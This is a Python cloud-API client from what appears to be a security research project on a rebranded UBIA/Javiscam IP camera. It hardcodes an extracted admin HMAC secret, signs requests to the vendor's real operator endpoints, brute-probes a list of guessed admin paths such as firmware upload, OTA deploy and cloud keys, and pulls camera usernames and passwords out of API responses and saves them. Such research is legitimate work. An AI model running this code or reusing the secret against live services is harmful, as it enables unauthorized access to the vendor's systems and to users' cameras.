Original tooling from the Camhak research project (camera teardown of a
rebranded UBIA / Javiscam IP camera). PyQt6 GUI on top of a curses TUI on
top of a service controller; per-service start/stop, intruder detection,
protocol fingerprinting, OAM HMAC signing, CVE verifiers, OTA bucket
probe, firmware fetcher, fuzzer, packet injection.
Tabs: Dashboard, Live Log, Intruders, Cloud API, Fuzzer, Inject, CVEs,
Config, Help. Real-time per-packet protocol detection, conntrack-based
original-destination lookup, log rotation at 1 GiB.
See SECURITY_PAPER.md for the full writeup, site/index.html for the
public report, README.md for usage. Run with:
sudo /usr/bin/python3 gui.py
Co-authored by Setec Labs.
258 lines
9.5 KiB
Python
258 lines
9.5 KiB
Python
"""UBox cloud API client — authenticate, list devices, check firmware, etc."""
|
|
|
|
import hashlib
|
|
import hmac
|
|
import base64
|
|
import json
|
|
import time
|
|
import urllib.request
|
|
import urllib.error
|
|
from utils.log import log, C_SUCCESS, C_ERROR, C_INFO, C_TRAFFIC, C_IMPORTANT
|
|
|
|
|
|
# ─── OAM (operator/admin) endpoint signing ───────────────────────
|
|
# Hardcoded secret extracted from com/http/OamHttpClient.java:28
|
|
OAM_BASE_URLS = [
|
|
"https://oam.ubianet.com/api",
|
|
"https://dev.ubianet.com/oam/api",
|
|
]
|
|
OAM_APPID = "30001"
|
|
OAM_CLIENT_ID = "" # empty in app code; may need to be set per-deployment
|
|
OAM_SECRET = "2894df25f8f740dff5266bc155c662ca"
|
|
|
|
|
|
def oam_sign(body_str, ts_ms, appid=OAM_APPID, client_id=OAM_CLIENT_ID,
|
|
secret=OAM_SECRET):
|
|
"""
|
|
Reproduce com.http.Encryption.Hmac:
|
|
sig_str = "<ts>:<appid>:<clientId>:<body>"
|
|
hmac = HmacSHA1(sig_str.utf8, secret.bytes)
|
|
result = hex(hmac)
|
|
"""
|
|
sig_str = f"{ts_ms}:{appid}:{client_id}:{body_str}"
|
|
h = hmac.new(secret.encode("utf-8"), sig_str.encode("utf-8"), hashlib.sha1)
|
|
return h.hexdigest()
|
|
|
|
|
|
def oam_post(endpoint, data, base_url=None):
|
|
"""
|
|
POST to an OAM endpoint with the OAM-SIGN header set.
|
|
Tries each known OAM base URL if the first fails.
|
|
"""
|
|
body = json.dumps(data).encode("utf-8")
|
|
body_str = body.decode("utf-8")
|
|
ts_ms = str(int(time.time() * 1000))
|
|
sign = oam_sign(body_str, ts_ms)
|
|
|
|
headers = {
|
|
"Content-Type": "application/json",
|
|
"OAM-SIGN": sign,
|
|
"OAM-APPID": OAM_APPID,
|
|
"CLIENT-ID": OAM_CLIENT_ID,
|
|
"timestamp": ts_ms,
|
|
"X-UbiaAPI-CallContext": "source=app&app=ubox&ver=1.1.360&osver=14",
|
|
}
|
|
|
|
bases = [base_url] if base_url else OAM_BASE_URLS
|
|
last_err = None
|
|
for b in bases:
|
|
url = f"{b}/{endpoint}"
|
|
log(f"OAM: POST {url}", C_INFO)
|
|
log(f" sign-str = {ts_ms}:{OAM_APPID}::{body_str[:80]}", C_INFO)
|
|
log(f" OAM-SIGN = {sign}", C_INFO)
|
|
req = urllib.request.Request(url, data=body, method="POST", headers=headers)
|
|
try:
|
|
with urllib.request.urlopen(req, timeout=15) as resp:
|
|
payload = json.loads(resp.read().decode("utf-8"))
|
|
log(f"OAM: {json.dumps(payload, indent=2)[:400]}", C_TRAFFIC)
|
|
return payload
|
|
except urllib.error.HTTPError as e:
|
|
body_text = e.read().decode("utf-8", errors="replace")[:400]
|
|
log(f"OAM: HTTP {e.code} from {b}: {body_text}", C_ERROR)
|
|
last_err = {"error": e.code, "body": body_text, "base": b}
|
|
except Exception as e:
|
|
log(f"OAM: error from {b}: {e}", C_ERROR)
|
|
last_err = {"error": str(e), "base": b}
|
|
return last_err or {"error": "all OAM bases failed"}
|
|
|
|
|
|
def oam_fuzz(endpoints):
|
|
"""
|
|
Hit a list of candidate OAM endpoints with empty bodies and report
|
|
which ones return non-404 responses (i.e. exist).
|
|
"""
|
|
results = {"hits": [], "404s": 0, "errors": 0, "tried": 0}
|
|
for ep in endpoints:
|
|
results["tried"] += 1
|
|
r = oam_post(ep, {})
|
|
if isinstance(r, dict):
|
|
err = r.get("error")
|
|
if err == 404:
|
|
results["404s"] += 1
|
|
elif err is not None:
|
|
results["errors"] += 1
|
|
results["hits"].append({"endpoint": ep, "error": err,
|
|
"body": r.get("body", "")[:200]})
|
|
else:
|
|
# Real JSON came back (msg=success or msg=fail with code)
|
|
results["hits"].append({"endpoint": ep,
|
|
"code": r.get("code"),
|
|
"msg": r.get("msg"),
|
|
"data": r.get("data")})
|
|
log(f"OAM-FUZZ: ✓ {ep} -> code={r.get('code')} msg={r.get('msg')}",
|
|
C_IMPORTANT)
|
|
log(f"OAM-FUZZ done: {len(results['hits'])} hits / {results['tried']} tried "
|
|
f"({results['404s']} 404s, {results['errors']} errors)", C_SUCCESS)
|
|
return results
|
|
|
|
|
|
# Candidate OAM endpoints — confirmed in source + admin guesses
|
|
OAM_ENDPOINT_GUESSES = [
|
|
# Confirmed in OamHttpClient.java
|
|
"lgc/bind_err",
|
|
"app/push_channel_reg",
|
|
# Common admin patterns to probe
|
|
"oam/users", "oam/user/list", "oam/user/info",
|
|
"oam/devices", "oam/device/list", "oam/device/info",
|
|
"oam/firmware", "oam/firmware/list", "oam/firmware/upload",
|
|
"oam/ota", "oam/ota/list", "oam/ota/deploy", "oam/ota/push",
|
|
"oam/config", "oam/cloud/config", "oam/cloud/keys",
|
|
"oam/stats", "oam/dashboard", "oam/system",
|
|
"oam/logs", "oam/audit", "oam/security",
|
|
"user/list", "user/info", "user/all",
|
|
"device/list", "device/info", "device/all",
|
|
"firmware/list", "firmware/all", "firmware/latest",
|
|
"ota/list", "ota/all", "ota/deploy",
|
|
"admin/users", "admin/devices", "admin/firmware",
|
|
"admin/config", "admin/system", "admin/stats",
|
|
"stats", "dashboard", "system/info", "system/version",
|
|
"lgc/bind_ok", "lgc/list", "lgc/info",
|
|
"app/version", "app/config",
|
|
"push/list", "push/send", "push/all",
|
|
]
|
|
|
|
|
|
|
|
def hash_password(password):
|
|
h = hmac.new(b"", password.encode("utf-8"), hashlib.sha1).digest()
|
|
b64 = base64.b64encode(h).decode("utf-8")
|
|
return b64.replace("+", "-").replace("/", "_").replace("=", ",")
|
|
|
|
|
|
def api_post(base_url, endpoint, data, token=None):
|
|
url = f"{base_url}/{endpoint}"
|
|
body = json.dumps(data).encode("utf-8")
|
|
req = urllib.request.Request(url, data=body, method="POST")
|
|
req.add_header("Content-Type", "application/json")
|
|
req.add_header("X-UbiaAPI-CallContext", "source=app&app=ubox&ver=1.1.360&osver=14")
|
|
if token:
|
|
req.add_header("X-Ubia-Auth-UserToken", token)
|
|
try:
|
|
with urllib.request.urlopen(req, timeout=15) as resp:
|
|
return json.loads(resp.read().decode("utf-8"))
|
|
except urllib.error.HTTPError as e:
|
|
return {"error": e.code, "body": e.read().decode("utf-8", errors="replace")[:500]}
|
|
except Exception as e:
|
|
return {"error": str(e)}
|
|
|
|
|
|
def login(cfg):
|
|
if not cfg["api_email"] or not cfg["api_password"]:
|
|
log("API: set api_email and api_password first", C_ERROR)
|
|
return False
|
|
hashed = hash_password(cfg["api_password"])
|
|
data = {
|
|
"account": cfg["api_email"], "password": hashed,
|
|
"app": "ubox", "app_version": "1.1.360",
|
|
"device_type": 1, "lang": "en", "brand": "Python",
|
|
"device_token": "none", "regid_jg": "fail",
|
|
"regid_xm": "fail", "regid_vivo": "fail",
|
|
}
|
|
log(f"API: logging in as {cfg['api_email']}...", C_INFO)
|
|
result = api_post(cfg["api_base"], "v3/login", data)
|
|
if result and result.get("msg") == "success":
|
|
cfg["api_token"] = result["data"]["Token"]
|
|
log(f"API: login OK — token={cfg['api_token'][:20]}...", C_SUCCESS)
|
|
|
|
# Extract app_config keys
|
|
app_cfg = result["data"].get("app_config", {})
|
|
if app_cfg:
|
|
log(f"API: leaked app_config keys extracted", C_IMPORTANT)
|
|
|
|
cfg.save()
|
|
return True
|
|
else:
|
|
log(f"API: login failed: {json.dumps(result)[:200]}", C_ERROR)
|
|
return False
|
|
|
|
|
|
def devices(cfg):
|
|
if not cfg["api_token"]:
|
|
log("API: login first", C_ERROR)
|
|
return []
|
|
result = api_post(cfg["api_base"], "user/device_list", {}, cfg["api_token"])
|
|
if result and result.get("msg") == "success":
|
|
devs = result["data"].get("list", [])
|
|
fw = result["data"].get("firmware_ver", [])
|
|
log(f"API: {len(devs)} device(s), firmware: {fw}", C_SUCCESS)
|
|
for d in devs:
|
|
uid = d.get("device_uid", "?")
|
|
name = d.get("name", "?")
|
|
cu = d.get("cam_user", "")
|
|
cp = d.get("cam_pwd", "")
|
|
model = d.get("model_num", "?")
|
|
bat = d.get("battery", "?")
|
|
log(f" [{uid}] {name} model={model} bat={bat}%", C_TRAFFIC)
|
|
if cu and cp:
|
|
log(f" LEAKED CREDS: {cu} / {cp}", C_IMPORTANT)
|
|
cfg["device_uid"] = uid
|
|
cfg["device_cam_user"] = cu
|
|
cfg["device_cam_pwd"] = cp
|
|
cfg.save()
|
|
return devs
|
|
else:
|
|
log(f"API: {json.dumps(result)[:300]}", C_ERROR)
|
|
return []
|
|
|
|
|
|
def check_firmware(cfg):
|
|
if not cfg["api_token"] or not cfg["device_uid"]:
|
|
log("API: login and get devices first", C_ERROR)
|
|
return None
|
|
result = api_post(cfg["api_base"], "user/qry/device/check_version/v3", {
|
|
"device_uid": cfg["device_uid"],
|
|
"host_version": "0.0.0.1",
|
|
"wifi_version": "0.0.0.1",
|
|
"is_lite": False, "zone_id": 2,
|
|
}, cfg["api_token"])
|
|
log(f"API firmware: {json.dumps(result, indent=2)}", C_TRAFFIC)
|
|
return result
|
|
|
|
|
|
def device_services(cfg):
|
|
if not cfg["api_token"] or not cfg["device_uid"]:
|
|
log("API: login and get devices first", C_ERROR)
|
|
return None
|
|
result = api_post(cfg["api_base"], "user/qry/device/device_services",
|
|
{"device_uid": cfg["device_uid"]}, cfg["api_token"])
|
|
log(f"API services: {json.dumps(result, indent=2)[:600]}", C_TRAFFIC)
|
|
return result
|
|
|
|
|
|
def raw_request(cfg, endpoint, data=None):
|
|
if not cfg["api_token"]:
|
|
log("API: login first", C_ERROR)
|
|
return None
|
|
log(f"API: POST {endpoint}", C_INFO)
|
|
result = api_post(cfg["api_base"], endpoint, data or {}, cfg["api_token"])
|
|
log(f"API: {json.dumps(result, indent=2)[:800]}", C_TRAFFIC)
|
|
return result
|
|
|
|
|
|
def families(cfg):
|
|
return raw_request(cfg, "user/families")
|
|
|
|
|
|
def device_list_v2(cfg):
|
|
return raw_request(cfg, "v2/user/device_list")
|